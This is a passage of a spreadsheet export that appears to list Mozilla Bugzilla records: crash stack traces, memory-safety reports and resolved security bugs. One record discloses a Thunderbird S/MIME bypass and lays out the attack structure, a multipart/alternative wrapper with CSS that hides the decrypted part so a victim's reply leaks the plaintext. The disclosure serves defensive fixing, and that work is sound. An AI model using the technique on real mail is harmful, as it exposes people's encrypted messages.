#8  0x00007f7104706e05 in (anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable (this=0x7f70ef090c10) at /home/mcmanus/src/mozilla2/wd/gecko-dev/dom/base/nsScriptLoader.cpp:788
#9  0x00007f7104706e49 in (anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable (this=0x7f70ef090c10) at /home/mcmanus/src/mozilla2/wd/gecko-dev/dom/base/nsScriptLoader.cpp:788
#10 0x00007f71030209e9 in nsRunnable::Release (this=0x7f70ef090c10) at /home/mcmanus/src/mozilla2/wd/gecko-dev/xpcom/glue/nsThreadUtils.cpp:32
#11 0x00007f71046f4944 in nsRefPtr&lt;(anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable&gt;::~nsRefPtr (this=0x7f70f5afca38) at ../../dist/include/nsRefPtr.h:59
#12 0x00007f71046f47bd in OffThreadScriptLoaderCallback (aToken=0x7f70eb5c3e60, aCallbackData=0x7f70ef090c10) at /home/mcmanus/src/mozilla2/wd/gecko-dev/dom/base/nsScriptLoader.cpp:847
#13 0x00007f71085d9dd2 in js::HelperThread::handleParseWorkload (this=0x7f70f5c6e4e0) at ../../../gecko-dev/js/src/vm/HelperThreads.cpp:1182
#14 0x00007f71085d8cba in js::HelperThread::threadLoop (this=0x7f70f5c6e4e0) at ../../../gecko-dev/js/src/vm/HelperThreads.cpp:1367
#15 0x00007f71085d71b7 in js::HelperThread::ThreadMain (arg=0x7f70f5c6e4e0) at ../../../gecko-dev/js/src/vm/HelperThreads.cpp:977
#16 0x00007f710b7b298b in _pt_root (arg=0x7f70f9c5e800) at ../../../../../gecko-dev/nsprpub/pr/src/pthreads/ptthread.c:212
#17 0x00007f710b3c30a5 in start_thread (arg=0x7f70f5afd700) at pthread_create.c:309
#18 0x00007f710153f88d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111</t>
        </is>
      </c>
      <c r="X358" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="359">
      <c r="A359" t="n">
        <v>484436</v>
      </c>
      <c r="B359" t="inlineStr">
        <is>
          <t>2009-03-20 11:30:01 -0700</t>
        </is>
      </c>
      <c r="C359" t="inlineStr">
        <is>
          <t>Website: "description" field should be removed under 'Featured Personas' on homepage</t>
        </is>
      </c>
      <c r="D359" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E359" t="n">
        <v>1</v>
      </c>
      <c r="F359" t="n">
        <v>1</v>
      </c>
      <c r="G359" t="n">
        <v>6</v>
      </c>
      <c r="H359" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I359" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J359" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K359" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L359" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M359" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N359" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O359" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P359" t="inlineStr"/>
      <c r="Q359" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R359" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S359" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T359" t="n">
        <v>1</v>
      </c>
      <c r="U359" t="n">
        <v>0</v>
      </c>
      <c r="V359" t="n">
        <v>2</v>
      </c>
      <c r="W359" t="inlineStr">
        <is>
          <t>Since we don't have descriptions for any of the Personas we will be featuring, we should remove that field. Beyond this release, we may want to add description fields under both the 'featured persona' and 'featured designer'.</t>
        </is>
      </c>
      <c r="X359" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="360">
      <c r="A360" t="n">
        <v>1027300</v>
      </c>
      <c r="B360" t="inlineStr">
        <is>
          <t>2014-06-18 13:53:13 -0700</t>
        </is>
      </c>
      <c r="C360" t="inlineStr">
        <is>
          <t>UMR in stun_get_siocgifconf_addrs</t>
        </is>
      </c>
      <c r="D360" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:43 -0700</t>
        </is>
      </c>
      <c r="E360" t="n">
        <v>1</v>
      </c>
      <c r="F360" t="n">
        <v>1</v>
      </c>
      <c r="G360" t="n">
        <v>3</v>
      </c>
      <c r="H360" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I360" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J360" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K360" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L360" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M360" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N360" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O360" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P360" t="inlineStr">
        <is>
          <t>[adv-main35+]</t>
        </is>
      </c>
      <c r="Q360" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R360" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S360" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T360" t="n">
        <v>1</v>
      </c>
      <c r="U360" t="n">
        <v>0</v>
      </c>
      <c r="V360" t="n">
        <v>9</v>
      </c>
      <c r="W360" t="inlineStr">
        <is>
          <t>If any failure occurs here:
http://dxr.mozilla.org/mozilla-central/source/media/mtransport/third_party/nICEr/src/stun/addrs.c?from=stun_get_siocgifconf_addrs&amp;case=true#608
|ptr| will be left pointing at uninitialized memory. A failure in the socket call above would do this, for sure.</t>
        </is>
      </c>
      <c r="X360" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="361">
      <c r="A361" t="n">
        <v>1841368</v>
      </c>
      <c r="B361" t="inlineStr">
        <is>
          <t>2023-06-30 18:55:04 -0700</t>
        </is>
      </c>
      <c r="C361" t="inlineStr">
        <is>
          <t>Access violation on mozilla::dom::Element::BindToTree after realloc failure on AttrArray::GrowBy</t>
        </is>
      </c>
      <c r="D361" t="inlineStr">
        <is>
          <t>2024-05-30 11:11:47 -0700</t>
        </is>
      </c>
      <c r="E361" t="n">
        <v>1</v>
      </c>
      <c r="F361" t="n">
        <v>1</v>
      </c>
      <c r="G361" t="n">
        <v>3</v>
      </c>
      <c r="H361" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I361" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J361" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K361" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L361" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M361" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N361" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O361" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P361" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main116+] [adv-ESR115.1+] [adv-ESR102.14+]</t>
        </is>
      </c>
      <c r="Q361" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R361" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S361" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T361" t="n">
        <v>1</v>
      </c>
      <c r="U361" t="n">
        <v>0</v>
      </c>
      <c r="V361" t="n">
        <v>33</v>
      </c>
      <c r="W361" t="inlineStr">
        <is>
          <t>Created attachment 9342007
testcase1.html
When using `DOMParser.parseFromString` to parse HTML innerHTML with mimeType `text/html` on low virtual memory, it able to crash on [`mozilla::dom::Element::BindToTree`](https://searchfox.org/mozilla-central/source/dom/base/Element.cpp#1913) at address e.g. 0x002ff004, 0x003ff004, 0x004ff004, 0x008ff004, 0xe11ff004, 0xffdff004, and more.., from the CPU register and crash address it looks like out-of-bound read.
From my observation the crash occur after [`mozilla::dom::DOMParser::ParseFromString`](https://searchfox.org/mozilla-central/source/dom/base/DOMParser.cpp#75) it went through `mozilla::dom::Element::SetAttrAndNotify` then on [`AttrArray::GrowBy`](https://searchfox.org/mozilla-central/source/dom/base/AttrArray.cpp#318) it do realloc but fail, then when `newImpl` is `nullptr` the `NS_ENSURE_TRUE` will return `false`.
The reduced testcase.html has very low success rate, for now it only for demonstrate HTML code that able to trigger `BindToTree` AV_READ crash. It's still unknown to me what key point that make the unreduced testcase more reliable, I decided to submit this for now, then figure that later.
## Tested on:
- Firefox Nightly 116.0a1 (2023-06-30) (32-bit) on Windows 11
- Firefox 114.0.2 (32-bit)</t>
        </is>
      </c>
      <c r="X361" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="362">
      <c r="A362" t="n">
        <v>1485097</v>
      </c>
      <c r="B362" t="inlineStr">
        <is>
          <t>2018-08-21 11:21:37 -0700</t>
        </is>
      </c>
      <c r="C362" t="inlineStr">
        <is>
          <t>Firefox Hangs with JAWS/NVDA Running on webpage with Auto-Complete</t>
        </is>
      </c>
      <c r="D362" t="inlineStr">
        <is>
          <t>2018-10-29 09:37:28 -0700</t>
        </is>
      </c>
      <c r="E362" t="n">
        <v>1</v>
      </c>
      <c r="F362" t="n">
        <v>1</v>
      </c>
      <c r="G362" t="n">
        <v>3</v>
      </c>
      <c r="H362" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I362" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J362" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K362" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L362" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M362" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N362" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O362" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P362" t="inlineStr"/>
      <c r="Q362" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R362" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S362" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T362" t="n">
        <v>1</v>
      </c>
      <c r="U362" t="n">
        <v>0</v>
      </c>
      <c r="V362" t="n">
        <v>22</v>
      </c>
      <c r="W362" t="inlineStr">
        <is>
          <t>Created attachment 9002852
Image of Page with Auto-Complete
Windows 10, Firefox 61.0.2 (64-bit), JAWS 2018.1807.8 ILM
We have developed a web application that uses a Telerik RadAutoComplete control. The Telerik auto-complete appears to be tagged properly with ARIA attributes. When running JAWS and loading this page with Firefox, Firefox hangs and becomes non-responsive. The page starts to render, then stops rendering and then Firefox hangs. 
https://awarepreview.aedmz.com/AwareEngineeringDemo
Username: FreedomScientific 
Password: can I provide privately somewhere?
This does not happen if JAWS is not running. The issue does not happen in IE11, Chrome or Edge browsers, with or without JAWS running.
We have worked with VFO (Freedom Scientific) Support and while they can reproduce the error, they have indicated it is a Mozilla bug, not a JAWS bug. They have also reproduced with NVDA to confirm the issue is affecting multiple screenreaders. 
While Firefox was unresponsive, our developer used DebugDiag to capture and analyze a series of memory dumps.
It showed a consistent stack trace of:
[various child method calls]
      xul.dll!mozilla::a11y::Accessible::ApplyARIAState(unsigned __int64 * aState=0x00c5eb70) Line 1249  C++
&gt;     xul.dll!mozilla::a11y::Accessible::State() Line 1154  C++
   xul.dll!mozilla::a11y::AccTextChangeEvent::AccTextChangeEvent(mozilla::a11y::Accessible * aAccessible=0x1cab9580, int aStart=0, const nsAString_internal &amp; aModifiedText={...}, bool aIsInserted=true, mozilla::a11y::EIsFromUserInput aIsFromUserInput=eNoUserInput) Line 92     C++
  xul.dll!mozilla::a11y::NotificationController::QueueMutationEvent(mozilla::a11y::AccTreeMutationEvent * aEvent=0x1a35d0c0) Line 257 C++
      xul.dll!mozilla::a11y::TreeMutation::AfterInsertion(mozilla::a11y::Accessible * aChild=0x1cab9460) Line 72    C++
      xul.dll!mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible * aChild=0x1cab9460, mozilla::a11y::Accessible * aNewParent=0x1cab9580, int aIdxInParent=0) Line 2253     C++
      xul.dll!mozilla::a11y::DocAccessible::CacheChildrenInSubtree(mozilla::a11y</t>
        </is>
      </c>
      <c r="X362" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="363">
      <c r="A363" t="n">
        <v>680456</v>
      </c>
      <c r="B363" t="inlineStr">
        <is>
          <t>2011-08-19 09:06:59 -0700</t>
        </is>
      </c>
      <c r="C363" t="inlineStr">
        <is>
          <t>Don't run compileAndGo scripts on globals with a cleared scope</t>
        </is>
      </c>
      <c r="D363" t="inlineStr">
        <is>
          <t>2015-10-16 11:50:49 -0700</t>
        </is>
      </c>
      <c r="E363" t="n">
        <v>1</v>
      </c>
      <c r="F363" t="n">
        <v>1</v>
      </c>
      <c r="G363" t="n">
        <v>3</v>
      </c>
      <c r="H363" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I363" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J363" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K363" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L363" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M363" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N363" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O363" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P363" t="inlineStr">
        <is>
          <t>[sg:critical][qa-] wanted-standalone-js</t>
        </is>
      </c>
      <c r="Q363" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R363" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S363" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T363" t="n">
        <v>1</v>
      </c>
      <c r="U363" t="n">
        <v>0</v>
      </c>
      <c r="V363" t="n">
        <v>33</v>
      </c>
      <c r="W363" t="inlineStr">
        <is>
          <t>Clearing a global's scope wrecks a whole host of assumptions which the JITs and TI make about scripts compiled against that global.  There are some guards against this when executing scripts, but these are not enough, and compileAndGo scripts can (and do) still run against the global after clearing it.
This is causing bug 679247 (intermittent TI tinderbox failure); I added some instrumentation, and found that a particular script is getting analyzed by inference, has its global cleared, and later on starts/resumes execution in the interpreter.  When the script executes a JSOP_LAMBDA it pushes a function with a different (reconstructed) Function.prototype, which TI assertions catch.
From cursory examination of the code, it looks like we only check for a cleared global in RunScript, and not when making inline calls from the interpreter.  It seems like interpreter inline calls could cross from an uncleared global to a cleared global, with no isCleared check occurring.
I don't know if fixing this would be enough, however.  Under what constraints are scopes cleared?  Can scripts associated with the global have frames on the stack?  Can such scripts still have mjit code?  If the latter holds, this would be a problem for the full call stubs which the mjit generates, which allow mjit frames to call arbitrary scripts which have jitcode, without a cleared global check.
The real fix here is to remove scope clearing entirely (bug 637099).</t>
        </is>
      </c>
      <c r="X363" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="364">
      <c r="A364" t="n">
        <v>235781</v>
      </c>
      <c r="B364" t="inlineStr">
        <is>
          <t>2004-02-26 19:56:04 -0800</t>
        </is>
      </c>
      <c r="C364" t="inlineStr">
        <is>
          <t>XPInstall ignores user's umask when installing files</t>
        </is>
      </c>
      <c r="D364" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E364" t="n">
        <v>1</v>
      </c>
      <c r="F364" t="n">
        <v>1</v>
      </c>
      <c r="G364" t="n">
        <v>6</v>
      </c>
      <c r="H364" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I364" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J364" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K364" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L364" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M364" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N364" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O364" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P364" t="inlineStr"/>
      <c r="Q364" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R364" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S364" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T364" t="n">
        <v>1</v>
      </c>
      <c r="U364" t="n">
        <v>0</v>
      </c>
      <c r="V364" t="n">
        <v>16</v>
      </c>
      <c r="W364" t="inlineStr">
        <is>
          <t>When files are installed via XPInstall, the user's umask is ignored.  The
XPInstall engine should respect the user's umask setting.  The problem code is here:
nsZipArchive::ExtractFile
http://lxr.mozilla.org/mozilla/source/modules/libjar/nsZipArchive.cpp#641
nsJAR::Extract
http://lxr.mozilla.org/mozilla/source/modules/libjar/nsJAR.cpp#251
both open the file with 0644 perms and then chmod the file to the appropriate
perms, but this sidesteps any umask.
Just to make things more complicated, the nsZipArchive is part of standalone
libjar, where PR_Open is defined as fopen in zipstub.h, so passing the file's
mode to PR_Open wouldn't work in that situation.
this bug contributed to problems in bug 231083.</t>
        </is>
      </c>
      <c r="X364" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="365">
      <c r="A365" t="n">
        <v>1571481</v>
      </c>
      <c r="B365" t="inlineStr">
        <is>
          <t>2019-08-05 09:37:09 -0700</t>
        </is>
      </c>
      <c r="C365" t="inlineStr">
        <is>
          <t>Covert Content Attack on S/MIME are (still) possible for multipart/alternative</t>
        </is>
      </c>
      <c r="D365" t="inlineStr">
        <is>
          <t>2020-08-08 09:36:12 -0700</t>
        </is>
      </c>
      <c r="E365" t="n">
        <v>1</v>
      </c>
      <c r="F365" t="n">
        <v>1</v>
      </c>
      <c r="G365" t="n">
        <v>2</v>
      </c>
      <c r="H365" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I365" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J365" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K365" t="inlineStr">
        <is>
          <t>60</t>
        </is>
      </c>
      <c r="L365" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M365" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N365" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O365" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P365" t="inlineStr"/>
      <c r="Q365" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R365" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S365" t="inlineStr">
        <is>
          <t>Thunderbird 70.0</t>
        </is>
      </c>
      <c r="T365" t="n">
        <v>1</v>
      </c>
      <c r="U365" t="n">
        <v>0</v>
      </c>
      <c r="V365" t="n">
        <v>49</v>
      </c>
      <c r="W365" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Steps to reproduce:
As a long-term fix for bug 1419417 (EFAIL direct exfiltration), partially encrypted S/MIME emails are no longer being decrypted (which is good). However, a bypass exists if the attacker uses a multipart/alternative message structure.
-----------------------------------------------------------
*Proof of concept: Leaking plaintext through reply/forward*
-----------------------------------------------------------
/Attacker model/: The attacker is in possession of an S/MIME encrypted message, which she may have obtained as passive man-in-the-middle or by actively hacking into the victim's mail server or gateway, etc.
/Attacker's goal/: Obtain the plaintext
/Prerequisites:/
- victim reads and composes messages in HTML (default setting in decent TB versions)
- victim replies or forwards the message (which is what email is used for, right?)
/Attack:/
The attacker modifies the outer MIME structure of the email: She wraps the captured ciphertext into her own specially crafted MIME email of type multipart/alternative as shown below.
multipart/alternative
   |--- Content-Type: text/html
   |    Please answer to this email
   |    &lt;style&gt;.moz-text-plain, .moz-quote-pre, fieldset {display: none;}&lt;/style&gt;
   +--- Content-Type: application/pkcs7-mime
This modified message is now re-send to the victim (e.g., the orginal recipient or anyone else who can act as a decryption oracle). Because of the CSS style, the existence of the ciphertext part is hidden to the user (while it still is transparently decrypted by Thunderbird). The plaintext is quoted within the reply message (while still hidden to the user).
Actual results:
The Plaintext of S/MIME encrypted messages can be leaked by a single reply to a benign looking email.
Expected results:
Multipart messages should not be decrypted. Instead, decryption should only be performed if the whole message (= single MIME root element) is encrypted. This countermeasure to bug 1419417 has already been applied for multipart/mixed, however it is not correctly enforced for multipart/alternative.</t>
        </is>
      </c>
      <c r="X365" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="366">
      <c r="A366" t="n">
        <v>763225</v>
      </c>
      <c r="B366" t="inlineStr">
        <is>
          <t>2012-06-09 13:04:08 -0700</t>
        </is>
      </c>
      <c r="C366" t="inlineStr">
        <is>
          <t>"Assertion failure: compartment mismatched" with Components.lookupMethod(v, "onclick")</t>
        </is>
      </c>
      <c r="D366" t="inlineStr">
        <is>
          <t>2012-12-11 11:59:45 -0800</t>
        </is>
      </c>
      <c r="E366" t="n">
        <v>1</v>
      </c>
      <c r="F366" t="n">
        <v>1</v>
      </c>
      <c r="G366" t="n">
        <v>3</v>
      </c>
      <c r="H366" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I366" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J366" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K366" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L366" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M366" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N366" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O366" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P366" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q366" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R366" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S366" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T366" t="n">
        <v>1</v>
      </c>
      <c r="U366" t="n">
        <v>0</v>
      </c>
      <c r="V366" t="n">
        <v>34</v>
      </c>
      <c r="W366" t="inlineStr">
        <is>
          <t>Created attachment 631690
testcase
Assertion failure: compartment mismatched, at js/src/jscntxtinlines.h:237</t>
        </is>
      </c>
      <c r="X366" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="367">
      <c r="A367" t="n">
        <v>1238592</v>
      </c>
      <c r="B367" t="inlineStr">
        <is>
          <t>2016-01-11 08:02:54 -0800</t>
        </is>
      </c>
      <c r="C367" t="inlineStr">
        <is>
          <t>Crash at xul!js::InlineSpaghettiStackIterator&lt;js::jit::MStoreToRecover&gt;::InlineSpaghettiStackIterator&lt;js::jit::MStoreToRecover&gt;+0x00000012)</t>
        </is>
      </c>
      <c r="D367" t="inlineStr">
        <is>
          <t>2018-10-25 05:37:20 -0700</t>
        </is>
      </c>
      <c r="E367" t="n">
        <v>1</v>
      </c>
      <c r="F367" t="n">
        <v>1</v>
      </c>
      <c r="G367" t="n">
        <v>3</v>
      </c>
      <c r="H367" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I367" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J367" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K367" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L367" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M367" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N367" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O367" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P367" t="inlineStr">
        <is>
          <t>[adv-main46+][adv-esr45.1+]required to fix bug 1221872 fully</t>
        </is>
      </c>
      <c r="Q367" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R367" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S367" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T367" t="n">
        <v>1</v>
      </c>
      <c r="U367" t="n">
        <v>0</v>
      </c>
      <c r="V367" t="n">
        <v>43</v>
      </c>
      <c r="W367" t="inlineStr">
        <is>
          <t>Created attachment 8706402
stack from todays tip on m-c trunk (windows 7 debug build)
crash found via bughunter and reproduced on a win7 debug build based on todays m-c tip
steps to reproduce:
--&gt; Load http://fashion.aeonsquare.net/tomicakoutu/
--&gt; Crash on Load 
xul!js::InlineSpaghettiStackIterator&lt;js::jit::MStoreToRecover&gt;::InlineSpaghettiStackIterator&lt;js::jit::MStoreToRecover&gt;+0x00000012)</t>
        </is>
      </c>
      <c r="X367" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="368">
      <c r="A368" t="n">
        <v>1228103</v>
      </c>
      <c r="B368" t="inlineStr">
        <is>
          <t>2015-11-25 12:51:50 -0800</t>
        </is>
      </c>
      <c r="C368" t="inlineStr">
        <is>
          <t>Lack of status return from nsScannerString::AppendUnicodeTo causes out-of-bounds read in AppendErrorPointer</t>
        </is>
      </c>
      <c r="D368" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:25 -0700</t>
        </is>
      </c>
      <c r="E368" t="n">
        <v>1</v>
      </c>
      <c r="F368" t="n">
        <v>1</v>
      </c>
      <c r="G368" t="n">
        <v>3</v>
      </c>
      <c r="H368" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I368" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J368" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K368" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L368" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M368" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N368" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O368" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P368" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q368" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R368" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S368" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T368" t="n">
        <v>1</v>
      </c>
      <c r="U368" t="n">
        <v>0</v>
      </c>
      <c r="V368" t="n">
        <v>40</v>
      </c>
      <c r="W368" t="inlineStr">
        <is>
          <t>Created attachment 8692130
poc.7z: unzip and use as described in comment 0 (1.1gb when unzipped)
nsScannerString::AppendUnicodeTo (parser\htmlparser\nsScannerString.cpp) calls nsAString::SetLength (which can fallibly fail under OOM conditions), but AppendUnicodeTo does not return status, so its callers incorrectly assume that it cannot fail. When the caller is AppendErrorPointer (parser\htmlparser\nsExpatDriver.cpp), and a document similar to the attached proof-of-concept is loaded, this omission causes AppendErrorPointer to read memory to which it has no right. AFAIKT this doesn't cause a meaningful information leak, only a broken error string and/or a crash. However, there are many other callers of nsScannerString::AppendUnicodeTo, plus there are callers of nsScannerString::CopyUnicodeTo, which has a similar bug. Probably some of these callers malfunction insecurely when AppendUnicodeTo or CopyUnicodeTo fail.
The bug is still present in the current trunk: http://hg.mozilla.org/mozilla-central/file/tip/parser/htmlparser/nsScannerString.cpp .
Details
-------
The bug is in the void return type:
485: void
486: AppendUnicodeTo( const nsScannerIterator&amp; aSrcStart,
487:                  const nsScannerIterator&amp; aSrcEnd,
488:                  nsAString&amp; aDest )
489:   {
490:     nsAString::iterator writer;
491:     uint32_t oldLength = aDest.Length();
492:     if (!aDest.SetLength(oldLength + Distance(aSrcStart, aSrcEnd), mozilla::fallible))
493:       return; // out of memory
494:     aDest.BeginWriting(writer).advance(oldLength);
